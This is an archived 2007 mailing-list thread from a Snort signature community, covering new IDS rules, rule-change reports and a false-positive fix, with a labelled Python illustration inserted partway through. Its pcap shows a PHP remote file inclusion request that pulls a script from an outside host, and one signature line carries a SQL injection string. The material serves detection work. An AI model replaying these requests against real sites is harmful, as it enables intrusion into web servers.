I'm happy to say that the current Wiki format for the bleeding threats documentation system is going to do the trick. Thanks to everyone that sent in tips and helped, and for the compliments. :)

For the event manager developers out there, you can officially link references to:

http://doc.bleedingthreats.net/SID

as in:
http://doc.bleedingthreats.net/2002383

The wiki will surely continue to evolve, but the url scheme will remain constant. Entries are updated when a new rev is added, old comments remain of course.

For signature authors: when you post a sig please take a moment after it's posted to throw any documentation about it into the wiki. It'll help you down the road if you need to make a change, and will of course help the rest of the community.
Even just pasting part of the email thread to the wiki is more than fine.

If you'd like to help out and put documentation into older signatures, please feel free to do so. I'm out some prizes and rewards donated by some of our sponsors. Anything you add now would go toward prizes as they get worked out.

Thanks all for your help and support. Please dig into the wiki and keep the tips and comments flowing!

Matt
-- 
--------------------------------------------
Matthew Jonkman
Bleeding Edge Threats
765-429-0398
765-807-3060 fax
http://www.bleedingthreats.net
--------------------------------------------

PGP: http://www.bleedingthreats.com/mattjonkman.asc

From shirkdog_list at hotmail.com Wed Mar 7 05:57:29 2007
From: shirkdog_list at hotmail.com (M. Shirk)
Date: Wed Mar 7 05:57:58 2007
Subject: [Bleeding-sigs] New PHP Attack Tool
In-Reply-To: <45EDBA0C.1050508@bleedingthreats.net>
Message-ID:

Saw this when writing up an analysis example:

Pcap data:

47 45 54 20 2F 74 6F 70 2E 70 68 70 3F 6C 61 79   GET /top.php?lay
70 61 74 68 3D 68 74 74 70 3A 2F 2F 32 30 33 2E   path=http://203.
31 39 38 2E 36 38 2E 32 33 36 2F 7E 6C 69 73 69   198.68.236/~lisi
72 2F 4D 2E 74 78 74 3F 26 2F 20 48 54 54 50 2F   r/M.txt?&/ HTTP/
31 2E 31 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A   1.1..Accept: */*
0D 0A 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67   ..Accept-Languag
65 3A 20 65 6E 2D 75 73 0D 0A 41 63 63 65 70 74   e: en-us..Accept
2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 2C   -Encoding: gzip,
20 64 65 66 6C 61 74 65 0D 0A 55 73 65 72 2D 41    deflate..User-A
67 65 6E 74 3A 20 4D 6F 72 66 65 75 73 20 46 75   gent: Morfeus Fu
63 6B 69 6E 67 20 53 63 61 6E 6E 65 72 0D 0A 48   cking Scanner..H

I added an F in the pcre, but you could probably get away with just a Morfeus check, or just use the whole word :-)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg: "BLEEDING-EDGE EXPLOIT PHP Attack Tool Morfeus F Scanner"; flow: established,to_server; content:"User-Agent\:"; nocase; pcre:"/User-Agent\:[^\n]+Morfeus\x20F/i"; reference:url,www.webmasterworld.com/search_engine_spiders/3227720.htm; classtype:web-application-attack; sid:666; rev:1;)

Shirkdog
' or 1=1--
http://www.shirkdog.us

From jonkman at bleedingthreats.net Wed Mar 7 12:35:06 2007
From: jonkman at bleedingthreats.net (Matt Jonkman)
Date: Wed Mar 7 12:37:03 2007
Subject: [Bleeding-sigs] New PHP Attack Tool
In-Reply-To:
References:
Message-ID: <45EEB17A.2020300@bleedingthreats.net>

Posting now. Nice catch. That's definitely a unique UA. :)

Thanks Shirk

Matt

From bleeding at bleedingthreats.net Wed Mar 7 18:00:05 2007
From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net)
Date: Wed Mar 7 18:00:10 2007
Subject: [Bleeding-sigs] Bleeding Edge Threats Daily Signature Changes
Message-ID: <20070307180005.F0A3322C097@sb03.us.bleedingsnort.com>

[***] Results from Oinkmaster started Wed Mar 7 13:00:05 2007 [***]

[+++] Added rules: [+++]
2003466 - BLEEDING-EDGE EXPLOIT PHP Attack Tool Morfeus F Scanner (bleeding-web.rules)

[///] Modified active rules: [///]
2003463 - BLEEDING-EDGE MALWARE CoolDeskAlert.com Adware User-Agent (Toolbar) or others (bleeding-malware.rules)
2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules)
2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules)
2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules)
2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules)
2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules)
2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules)
2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules)
2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules)
2404006 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) (bleeding-botcc.rules)
2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
2405006 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)

[+++] Added non-rule lines: [+++]
-> Added to bleeding-drop-BLOCK.rules (1):
# VERSION 115
-> Added to bleeding-drop.rules (1):
# VERSION 115
-> Added to bleeding-sid-msg.map (1):
2003466 || BLEEDING-EDGE EXPLOIT PHP Attack Tool Morfeus F Scanner || url,www.webmasterworld.com/search_engine_spiders/3227720.htm
-> Added to bleeding-web.rules (1):
#by shirkdog

[---] Removed non-rule lines: [---]
-> Removed from bleeding-drop-BLOCK.rules (1):
# VERSION 114
-> Removed from bleeding-drop.rules (1):
# VERSION 114

From scheidell at secnap.net Wed Mar 7 18:10:31 2007
From: scheidell at secnap.net (Michael Scheidell)
Date: Wed Mar 7 18:10:57 2007
Subject: [Bleeding-sigs] FP for CoolDeskAlert/ Sig 2003463
Message-ID: <45EF0017.2090308@secnap.net>

packet: shows GoogleToolbar, but sig checks for !"Google Toolbar" (notice the space?) do we do regex? "\b?" or something?

Sig: #2003463

content:"User-Agent\:"; nocase; content:!"Google Toolbar"; distance:0; pcre:"/User-Agent\:[^\n]+Toolbar/i";

maybe nocase; content:!"Host: toolbar.google.com" instead?
Jacob can you verify packets, maybe Google Toolbar does both?

000 : 47 45 54 20 2F 73 65 72 76 69 63 65 2F 75 70 64 GET /service/upd
010 : 61 74 65 3F 61 73 3D 74 62 69 65 26 76 65 72 73 ate?as=tbie&vers
020 : 69 6F 6E 3D 34 2E 30 2E 31 36 30 31 2E 34 39 37 ion=4.0.1601.497
030 : 38 26 6F 73 3D 62 69 67 26 68 6C 3D 65 6E 26 74 8&os=big&hl=en&t
040 : 62 62 72 61 6E 64 3D 47 47 4C 52 26 73 64 3D 63 bbrand=GGLR&sd=c
050 : 6F 6D 26 6F 73 76 65 72 3D 35 2E 31 26 6F 73 73 om&osver=5.1&oss
060 : 70 3D 32 2E 30 26 62 72 6F 77 73 65 72 3D 36 2E p=2.0&browser=6.
070 : 30 2E 32 39 30 30 2E 32 31 38 30 26 72 6C 7A 3D 0.2900.2180&rlz=
080 : 26 69 64 3D 33 32 31 42 38 34 42 37 36 30 32 39 &id=321B84B76029
090 : 37 38 42 32 33 37 44 34 32 30 34 38 34 32 37 36 78B237D420484276
0a0 : 30 31 45 37 31 36 35 30 31 34 38 6F 4A 52 4A 55 01E71650148oJRJU
0b0 : 26 65 78 74 3D 2A 26 64 73 3D 31 20 48 54 54 50 &ext=*&ds=1 HTTP
0c0 : 2F 31 2E 31 0D 0A 52 65 66 65 72 65 72 3A 20 6E /1.1..Referer: n
0d0 : 61 76 63 6C 69 65 6E 74 2E 75 70 64 61 74 65 2F avclient.update/
0e0 : 65 6E 2F 34 2E 30 2E 31 36 30 31 2E 34 39 37 38 en/4.0.1601.4978
0f0 : 2D 62 69 67 0D 0A 55 73 65 72 2D 41 67 65 6E 74 -big..User-Agent
100 : 3A 20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 : Mozilla/4.0 (c
110 : 6F 6D 70 61 74 69 62 6C 65 3B 20 47 6F 6F 67 6C ompatible; Googl
120 : 65 54 6F 6F 6C 62 61 72 20 34 2E 30 2E 31 36 30 eToolbar 4.0.160
130 : 31 2E 34 39 37 38 2D 62 69 67 3B 20 57 69 6E 64 1.4978-big; Wind
140 : 6F 77 73 20 58 50 20 35 2E 31 3B 20 4D 53 49 45 ows XP 5.1; MSIE
150 : 20 36 2E 30 2E 32 39 30 30 2E 32 31 38 30 29 0D 6.0.2900.2180).
160 : 0A 48 6F 73 74 3A 20 74 6F 6F 6C 62 61 72 2E 67 .Host: toolbar.g
170 : 6F 6F 67 6C 65 2E 63 6F 6D 0D 0A 0D 0A oogle.com....

From axnjxnind at gmail.com Wed Mar 7 18:43:13 2007
From: axnjxnind at gmail.com (axn jxn)
Date: Wed Mar 7 18:43:35 2007
Subject: [Bleeding-sigs] FP for CoolDeskAlert/ Sig 2003463
In-Reply-To: <45EF0017.2090308@secnap.net>
References: <45EF0017.2090308@secnap.net>
Message-ID: <5219f7470703071043l6e6134ceh626ae884572da9f9@mail.gmail.com>

I'll default to Matt's judgement on this one. Seems to be 6 of one, half dozen of another. Either take the space out of the "Google Toolbar" negation or go with Michael's recommendation of negating Host: toolbar.google.com. Matt, thoughts?

Jacob

On 3/7/07, Michael Scheidell wrote:
> packet: shows GoogleToolbar, but sig checks for !"Google Toolbar"
> (notice the space?) do we do regex? "\b?" or something?
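As an added illustration (not code from this thread or from the Bleeding ruleset), the following Python emulation of the option chain of sid 2003463 runs the rule over a request rebuilt from the ASCII column of Michael's dump and over two constructed requests. It shows why the spaced "Google Toolbar" negation can never suppress "GoogleToolbar", and that a Host negation written with distance:0 only helps when Host follows User-Agent. The payloads, the ExampleToolbar user agent and all function names are constructed for this demonstration.

```python
import re

# Constructed from the ASCII column of the posted hex dump; the long
# &id=... client identifier is dropped because the rule never inspects it.
GOOGLE_TOOLBAR_REQUEST = (
    b"GET /service/update?as=tbie&version=4.0.1601.4978&os=big&hl=en HTTP/1.1\r\n"
    b"Referer: navclient.update/en/4.0.1601.4978-big\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; GoogleToolbar 4.0.1601.4978-big; "
    b"Windows XP 5.1; MSIE 6.0.2900.2180)\r\n"
    b"Host: toolbar.google.com\r\n\r\n"
)

# Constructed: same client, but Host sent before User-Agent. HTTP does not
# fix header order, so a rule must not assume it.
GOOGLE_TOOLBAR_HOST_FIRST = (
    b"GET /service/update?as=tbie HTTP/1.1\r\n"
    b"Host: toolbar.google.com\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; GoogleToolbar 4.0.1601.4978-big)\r\n\r\n"
)

# Constructed: a made-up "Toolbar" user agent that the rule should keep catching.
OTHER_TOOLBAR_REQUEST = (
    b"GET /ping.php HTTP/1.1\r\n"
    b"User-Agent: ExampleToolbar/1.0\r\n"
    b"Host: stats.example.invalid\r\n\r\n"
)

UA_HEADER = b"user-agent:"
TOOLBAR_PCRE = re.compile(rb"User-Agent:[^\n]+Toolbar", re.IGNORECASE)


def rule_matches(payload, negations):
    """Evaluate the option chain of sid 2003463 against one request payload.

    negations is a list of (pattern, relative) pairs standing in for
    content:!"pattern" options. relative=True mimics distance:0 (the negated
    search starts where the User-Agent match ended); relative=False searches
    the whole payload. Negations are case-sensitive, as in the posted rule,
    which has no nocase on them.
    """
    # content:"User-Agent\:"; nocase;
    pos = payload.lower().find(UA_HEADER)
    if pos < 0:
        return False
    cursor = pos + len(UA_HEADER)

    # content:!"..."; [distance:0;] -> the rule fails as soon as a negated
    # pattern IS found inside the searched region.
    for pattern, relative in negations:
        region = payload[cursor:] if relative else payload
        if pattern in region:
            return False

    # pcre:"/User-Agent\:[^\n]+Toolbar/i" (no R modifier, so whole payload)
    return TOOLBAR_PCRE.search(payload) is not None


# The negation as posted, and the two replacements discussed in the thread.
AS_POSTED = [(b"Google Toolbar", True)]
NEGATE_UA_NO_SPACE = [(b"GoogleToolbar", True)]
NEGATE_HOST_RELATIVE = [(b"Host: toolbar.google.com", True)]
NEGATE_HOST_ABSOLUTE = [(b"Host: toolbar.google.com", False)]


def evaluate_variants():
    """Per variant: does the posted Google Toolbar request still alert?"""
    return {
        "as_posted": rule_matches(GOOGLE_TOOLBAR_REQUEST, AS_POSTED),
        "ua_no_space": rule_matches(GOOGLE_TOOLBAR_REQUEST, NEGATE_UA_NO_SPACE),
        "host_relative": rule_matches(GOOGLE_TOOLBAR_REQUEST, NEGATE_HOST_RELATIVE),
        "host_absolute": rule_matches(GOOGLE_TOOLBAR_REQUEST, NEGATE_HOST_ABSOLUTE),
    }


def header_order_pitfall():
    """With Host ahead of User-Agent, a distance:0 negation never sees it."""
    return (
        rule_matches(GOOGLE_TOOLBAR_HOST_FIRST, NEGATE_HOST_RELATIVE),
        rule_matches(GOOGLE_TOOLBAR_HOST_FIRST, NEGATE_HOST_ABSOLUTE),
    )


if __name__ == "__main__":
    for name, alerted in evaluate_variants().items():
        print(f"{name:14s} -> {'ALERT (false positive)' if alerted else 'suppressed'}")
    print("host-first request, relative/absolute negation:", header_order_pitfall())
    print("ExampleToolbar still caught:",
          rule_matches(OTHER_TOOLBAR_REQUEST, NEGATE_UA_NO_SPACE + NEGATE_HOST_ABSOLUTE))
```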
From jonkman at bleedingthreats.net Wed Mar 7 19:01:07 2007
From: jonkman at bleedingthreats.net (Matt Jonkman)
Date: Wed Mar 7 19:03:36 2007
Subject: [Bleeding-sigs] FP for CoolDeskAlert/ Sig 2003463
In-Reply-To: <5219f7470703071043l6e6134ceh626ae884572da9f9@mail.gmail.com>
References: <45EF0017.2090308@secnap.net> <5219f7470703071043l6e6134ceh626ae884572da9f9@mail.gmail.com>
Message-ID: <45EF0BF3.1050904@bleedingthreats.net>

Had a discussion on irc, cunningpike brought this up too. I added a second content negation for it. Current version is here:

http://doc.bleedingthreats.net/2003463

I don't think there'll be a huge difference in load on either.

Although, negating the host: toolbar.... might be more reliable. Anyone can use that UA string, but it'd be tough to use the google host string. Thoughts?

Matt
From scheidell at secnap.net Thu Mar 8 01:42:00 2007
From: scheidell at secnap.net (Michael Scheidell)
Date: Thu Mar 8 01:42:29 2007
Subject: [Bleeding-sigs] FP for CoolDeskAlert/ Sig 2003463
Message-ID:

> -----Original Message-----
> From: bleeding-sigs-bounces@bleedingthreats.net
> [mailto:bleeding-sigs-bounces@bleedingthreats.net] On Behalf Of Matt Jonkman
> Sent: Wednesday, March 07, 2007 2:01 PM
> To: Bleeding Sigs
> Subject: Re: [Bleeding-sigs] FP for CoolDeskAlert/ Sig 2003463
>
> Had a discussion on irc, cunningpike brought this up too. I added a second content negation for it. Current version is here:
>
> http://doc.bleedingthreats.net/2003463
>
> I don't think there'll be a huge difference in load on either.
>
> Although, negating the host: toolbar.... might be more reliable. Anyone can use that UA string, but it'd be tough to use the google host string. Thoughts?

IF the google host string is consistent. (and, yes, negating via UA is easy)

Just look at what is happening with some of these viruses, starting, what was it, a month ago, 6:30 one Sunday am (eastern time) all of a sudden we get morphing trojan-downloaders, all off a few bytes.

However, real hackers (crackers?) don't really need to care about the small, (infinitesimally small) number of companies that can actually track them, I don't think they really care about snort/bleeding edge rules. They can cause enough havoc with the people who won't even patch their systems, let alone those who actually monitor them.

-- 
Michael Scheidell, CTO
SECNAP Network Security
Privacy and Security Training: (ok, we do a lot more than that)
http://www.secnap.com/training

From jonkman at bleedingthreats.net Thu Mar 8 16:58:26 2007
From: jonkman at bleedingthreats.net (Matt Jonkman)
Date: Thu Mar 8 16:57:42 2007
Subject: [Bleeding-sigs] Oemji Spyware sigs
Message-ID: <45F040B2.9050608@bleedingthreats.net>

From shirkdog, based on spyware listening post hits:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE MALWARE Oemji Spyware User-Agent (Oemji)"; flow:to_server,established; content:"User-Agent\:"; nocase; pcre:"/User-Agent\:[^\n]+Oemji/i"; classtype:trojan-activity; sid:2003468; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE MALWARE Oemji.com Spyware Settings Update"; flow:established,to_server; uricontent:"/OemjiSearchPlus.ini"; nocase; reference:url,www3.ca.com/securityadvisor/pest/pest.aspx?id=453094187; sid:2003467; rev:1;)

Thanks shirkdog!
Matt -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From bleeding at bleedingthreats.net Thu Mar 8 18:00:09 2007 From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net) Date: Thu Mar 8 18:00:11 2007 Subject: [Bleeding-sigs] Bleeding Edge Threats Daily Signature Changes Message-ID: <20070308180009.5D4CF22C0AA@sb03.us.bleedingsnort.com> [***] Results from Oinkmaster started Thu Mar 8 13:00:09 2007 [***] [+++] Added rules: [+++] 2003467 - BLEEDING-EDGE MALWARE Oemji.com Spyware Settings Update (bleeding-malware.rules) 2003468 - BLEEDING-EDGE MALWARE Oemji Spyware User-Agent (Oemji) (bleeding-malware.rules) 2003469 - BLEEDING-EDGE POLICY AOL Toolbar User-Agent (AOLToolbar) (bleeding-policy.rules) [///] Modified active rules: [///] 2003463 - BLEEDING-EDGE MALWARE Suspicious User-Agent (Toolbar) Possibly Malware/Spyware (bleeding-malware.rules) 2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed 
Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules) 2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules) 2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules) 2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) [---] Removed rules: [---] 2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules) 2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules) 2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules) 2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules) 2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules) 2404006 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) (bleeding-botcc.rules) 2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405006 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to bleeding-drop-BLOCK.rules (1): # VERSION 116 -> Added to bleeding-drop.rules (1): # VERSION 116 -> Added to bleeding-malware.rules (2): #by shirkdog from spyware lp data #by Shirkdog, from spyware lp hits -> Added to bleeding-policy.rules (1): #by Matt Jonkman, from qru -> Added to 
bleeding-sid-msg.map (4): 2003463 || BLEEDING-EDGE MALWARE Suspicious User-Agent (Toolbar) Possibly Malware/Spyware 2003467 || BLEEDING-EDGE MALWARE Oemji.com Spyware Settings Update || url,www3.ca.com/securityadvisor/pest/pest.aspx?id=453094187 2003468 || BLEEDING-EDGE MALWARE Oemji Spyware User-Agent (Oemji) 2003469 || BLEEDING-EDGE POLICY AOL Toolbar User-Agent (AOLToolbar) [---] Removed non-rule lines: [---] -> Removed from bleeding-drop-BLOCK.rules (1): # VERSION 115 -> Removed from bleeding-drop.rules (1): # VERSION 115 -> Removed from bleeding-sid-msg.map (13): 2003463 || BLEEDING-EDGE MALWARE CoolDeskAlert.com Adware User-Agent (Toolbar) or others 2404001 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) || url,www.shadowserver.org 2404002 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) || url,www.shadowserver.org 2404003 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) || url,www.shadowserver.org 2404004 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) || url,www.shadowserver.org 2404005 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) || url,www.shadowserver.org 2404006 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) || url,www.shadowserver.org 2405001 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE || url,www.shadowserver.org 2405002 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE || url,www.shadowserver.org 2405003 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE || url,www.shadowserver.org 2405004 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE || url,www.shadowserver.org 2405005 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE || url,www.shadowserver.org 2405006 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE || url,www.shadowserver.org From jonkman at bleedingthreats.net Thu Mar 8 21:19:01 2007 From: jonkman at bleedingthreats.net (Matt 
Jonkman)
Date: Thu Mar 8 21:18:15 2007
Subject: [Bleeding-sigs] Reference fixes
Message-ID: <45F07DC5.9020504@bleedingthreats.net>

I removed the reference from a number of the user-agent sigs in MALWARE. The link was bad. No rule updates, just that.

Matt

-- 
--------------------------------------------
Matthew Jonkman
Bleeding Edge Threats
765-429-0398
765-807-3060 fax
http://www.bleedingthreats.net
--------------------------------------------
PGP: http://www.bleedingthreats.com/mattjonkman.asc


From bleeding at bleedingthreats.net Fri Mar 9 15:00:05 2007
From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net)
Date: Fri Mar 9 15:00:16 2007
Subject: [Bleeding-sigs] Bleeding Edge Threats Weekly Signature Changes
Message-ID: <20070309150005.2A08722C08B@sb03.us.bleedingsnort.com>

[***] Results from Oinkmaster started Fri Mar 9 10:00:05 2007 [***]

[+++] Added rules: [+++]

2003462 - BLEEDING-EDGE MALWARE CoolDeskAlert Spyware Activity (bleeding-malware.rules)
2003463 - BLEEDING-EDGE MALWARE Suspicious User-Agent (Toolbar) Possibly Malware/Spyware (bleeding-malware.rules)
2003464 - BLEEDING-EDGE ATTACK RESPONSE Unusual FTP Server Banner (warFTPd) (bleeding-attack_response.rules)
2003465 - BLEEDING-EDGE ATTACK RESPONSE Unusual FTP Server Banner (freeFTPd) (bleeding-attack_response.rules)
2003466 - BLEEDING-EDGE EXPLOIT PHP Attack Tool Morfeus F Scanner (bleeding-web.rules)
2003467 - BLEEDING-EDGE MALWARE Oemji.com Spyware Settings Update (bleeding-malware.rules)
2003468 - BLEEDING-EDGE MALWARE Oemji Spyware User-Agent (Oemji) (bleeding-malware.rules)
2003469 - BLEEDING-EDGE POLICY AOL Toolbar User-Agent (AOLToolbar) (bleeding-policy.rules)

[///] Modified active rules: [///]

2001852 - BLEEDING-EDGE MALWARE 404Search Spyware User Agent (bleeding-malware.rules)
2001853 - BLEEDING-EDGE MALWARE Easy Search Bar Spyware User Agent (bleeding-malware.rules)
2001854 - BLEEDING-EDGE MALWARE EZULA Spyware User Agent (bleeding-malware.rules)
2001855 - BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (1) (bleeding-malware.rules)
2001858 - BLEEDING-EDGE MALWARE Hotbar Spyware User Agent (bleeding-malware.rules)
2001859 - BLEEDING-EDGE MALWARE Cool Web Search Spyware User Agent (bleeding-malware.rules)
2001860 - BLEEDING-EDGE MALWARE Kontiki Spyware User Agent (bleeding-malware.rules)
2001861 - BLEEDING-EDGE MALWARE Micro-Gaming Spyware User Agent (bleeding-malware.rules)
2001862 - BLEEDING-EDGE MALWARE Surf Assistant Spyware User Agent (bleeding-malware.rules)
2001863 - BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (2) (bleeding-malware.rules)
2001864 - BLEEDING-EDGE MALWARE Fun Web Products Spyware User Agent (3) (bleeding-malware.rules)
2001865 - BLEEDING-EDGE MALWARE MyWebSearch Spyware User Agent (bleeding-malware.rules)
2001867 - BLEEDING-EDGE MALWARE Search Engine 2000 Spyware User Agent (bleeding-malware.rules)
2001868 - BLEEDING-EDGE MALWARE SureSeeker Spyware User Agent (bleeding-malware.rules)
2001869 - BLEEDING-EDGE MALWARE Sidesearch Spyware User Agent (bleeding-malware.rules)
2001870 - BLEEDING-EDGE MALWARE Surfplayer Spyware User Agent (bleeding-malware.rules)
2001871 - BLEEDING-EDGE MALWARE Target Saver Spyware User Agent (bleeding-malware.rules)
2001872 - BLEEDING-EDGE MALWARE Visicom Spyware User Agent (bleeding-malware.rules)
2002082 - BLEEDING-EDGE POLICY Unusual User Agent (Client) (bleeding-policy.rules)
2002383 - BLEEDING-EDGE SCAN Potential FTP Brute-Force attempt (bleeding-scan.rules)
2002402 - BLEEDING-EDGE MALWARE Web Search User Agent 3 (bleeding-malware.rules)
2003212 - BLEEDING-EDGE EXPLOIT Microsoft Office Data Structure Corruption (unpatched) (bleeding-exploit.rules)
2003308 - BLEEDING-EDGE P2P Edonkey IP Request (bleeding-p2p.rules)
2003309 - BLEEDING-EDGE P2P Edonkey IP Reply (bleeding-p2p.rules)
2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
